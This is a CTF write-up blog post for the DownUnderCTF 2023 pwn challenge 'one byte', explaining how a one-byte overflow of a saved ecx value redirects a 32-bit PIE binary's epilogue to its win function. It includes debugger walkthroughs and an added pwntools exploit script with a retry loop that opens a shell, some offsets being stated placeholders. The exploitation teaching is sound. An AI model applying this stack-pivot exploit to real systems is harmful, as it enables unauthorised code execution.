
[DownUnderCTF 2023 Writeup][pwn] one byte

  • shinkhong97
  • Sep 4, 2023
  • 2 min read

Updated: Nov 4, 2023



This is one of the challenges for beginner pwn players.

First of all, we inspect the given binary. It is a 32-bit ELF, so addresses are 4 bytes wide.

checksec:

[screenshot: checksec output]

PIE is enabled, so the binary is loaded at a randomised base and the addresses of its functions change from run to run. To reach a function by its real address we need the base address of the binary at runtime (or a leak from which we can compute it) and then add the function's fixed offset inside the ELF.

[screenshot: challenge source code]

Looking at the source code, the game becomes easy because the program prints the address of the function init. The aim is to execute the function win. Both functions live in the same PIE binary, so the distance between them is fixed: win = leaked address of init + (offset of win - offset of init).

Paying more attention to lines 20 and 21, we see that buf is declared as 0x10 bytes but the program reads 0x11 bytes into it: we have exactly one byte of overflow.

Let's take a look at the assembly of main:

[screenshot: disassembly of main]

Looking at the last snippet, we see that the epilogue of main does not simply leave and ret: it reloads ecx from the stack and then sets esp relative to ecx before the ret. This is gcc's 32-bit stack-realignment code, which saves the caller's stack pointer in ecx in the prologue and restores it with lea esp, [ecx-4] right before returning. So if we control the saved ecx, we control where esp points when ret executes, and therefore which value is popped as the return address.

A single extra byte is enough to achieve that. Let's run the program under a debugger to take a deeper look (keep in mind that a debugger normally disables ASLR, so the concrete stack addresses below are only valid for that session).

First, we get the leaked address of init: 0x565561bd

[screenshot: debugger output with the leaked address of init]

buf is located at ebp-0x18, i.e. 0x18 bytes below ebp.

[screenshot: debugger output showing the location of buf]

After the read, main's epilogue loads ecx from the stack slot at ebp-8 (0xffffcd00 in this session). Since buf starts at ebp-0x18 and is 0x10 bytes long, it ends exactly at ebp-8: the 17th byte of our input lands on the saved ecx.

[screenshot: debugger output showing the saved ecx at ebp-8]

So by sending 0x11 bytes we control the lowest byte of ecx (the machine is little-endian, so the first byte of the saved value is its least significant byte).

[screenshot: debugger output with the overwritten low byte of ecx]

The payload is therefore 12 junk bytes, then the 4-byte address of win (which lands at buf+12 = ebp-0xc), then a single null byte. The null byte turns the saved ecx into 0xffffcd00 = ebp-8, so the epilogue sets esp = ecx-4 = ebp-0xc and ret pops the address of win we placed there (based on the last snippet of asm code of the main function). One caveat: outside the debugger the stack is randomised, and the overflow byte has to match the real low byte of ebp-8 on that particular run. The stack is kept 16-byte aligned, so the low nibble of that byte is fixed but the upper nibble varies, which means a fixed byte such as 0x00 lines up in roughly one run out of sixteen; simply rerun the exploit until it lands.

This is the result of exploiting the local binary:

[screenshot: local exploitation result]

And finally, we exploit the remote server and get the flag:

[screenshot: remote exploitation result with the flag]

solve.py

[screenshot: solve.py]
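As an added example (a reconstruction written for this page, not the author's own solve.py), here is a pwntools-style script that implements the steps above: parse the leaked init address, compute the PIE base and the address of win, build the 17-byte payload, and retry until the overflow byte matches the randomised stack. The symbol offsets INIT_OFFSET and WIN_OFFSET, the binary name ./onebyte, the assumption that the leak is the first line printed, and the assumption that win gives us a shell are all assumptions of this example and not taken from the writeup; read the real offsets from the binary with nm before using it.

```python
import re
import struct

# Offsets of the two functions inside the PIE binary. These are ASSUMPTIONS for
# the example: INIT_OFFSET is the leak seen in the debugger (0x565561bd) minus
# the usual no-ASLR load base of a 32-bit PIE (0x56555000); WIN_OFFSET is a
# placeholder. Read the real values with:  nm ./onebyte | grep -E ' (init|win)$'
INIT_OFFSET = 0x11bd
WIN_OFFSET = 0x11d0

BUF_SIZE = 0x10   # char buf[0x10]
READ_SIZE = 0x11  # read(0, buf, 0x11): exactly one byte of overflow
WIN_SLOT = 12     # buf+12 == ebp-0xc: the slot ret pops after lea esp, [ecx-4]


def parse_leak(line: bytes) -> int:
    """Pull the first 0x... hex value out of the program's leak line."""
    m = re.search(rb"0x([0-9a-fA-F]+)", line)
    if m is None:
        raise ValueError(f"no address found in leak line: {line!r}")
    return int(m.group(1), 16)


def pie_base(init_addr: int) -> int:
    """PIE base = leaked address of init - init's offset inside the ELF."""
    base = init_addr - INIT_OFFSET
    if base & 0xFFF:
        # A real load base is page aligned; anything else means INIT_OFFSET is wrong.
        raise ValueError(f"base {base:#x} is not page aligned, check INIT_OFFSET")
    return base


def win_addr(init_addr: int) -> int:
    return pie_base(init_addr) + WIN_OFFSET


def saved_ecx_byte(ebp: int) -> int:
    """The value the overflow byte must take for a given ebp.

    main's epilogue does esp = ecx - 4; ret. We want esp == ebp-0xc (where the
    win address sits), so the saved ecx must become ebp-8, which is also the
    address of the saved ecx itself. Only its lowest byte is ours to set, and
    outside a debugger we do not know ebp, so the exploit guesses (0x00 here).
    """
    return (ebp - 8) & 0xFF


def build_payload(win: int, overflow_byte: int = 0x00) -> bytes:
    """12 bytes of filler, the win address at buf+12, then the one overflow byte."""
    payload = b"A" * WIN_SLOT + struct.pack("<I", win) + bytes([overflow_byte])
    if len(payload) != READ_SIZE:
        raise AssertionError("payload must be exactly 0x11 bytes")
    return payload


if __name__ == "__main__":
    import sys
    from pwn import context, process, remote  # pwntools, only needed for a live run

    context.log_level = "error"
    for attempt in range(1, 65):
        # ./onebyte and the host/port handling are assumptions of this example.
        io = remote(sys.argv[1], int(sys.argv[2])) if len(sys.argv) == 3 else process("./onebyte")
        leak = parse_leak(io.recvline())          # assumption: leak is the first line
        io.send(build_payload(win_addr(leak)))
        # Assumption: win() hands us a shell. Probe it; if the guessed byte was
        # wrong the process crashes instead, and we simply try again.
        io.sendline(b"echo WIN")
        try:
            got = io.recvline(timeout=2)
        except EOFError:
            got = b""
        if b"WIN" in got:
            print(f"shell after {attempt} attempt(s)")
            io.interactive()
            break
        io.close()
```

The retry loop exists because, as noted above, the stack is randomised outside the debugger and a fixed overflow byte only matches about one run in sixteen; the probe after the payload distinguishes a shell from a crash so the loop can stop as soon as it lands.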

For more challenges in the contest, please visit this GitHub repo: https://github.com/DownUnderCTF/Challenges_2023_Public/

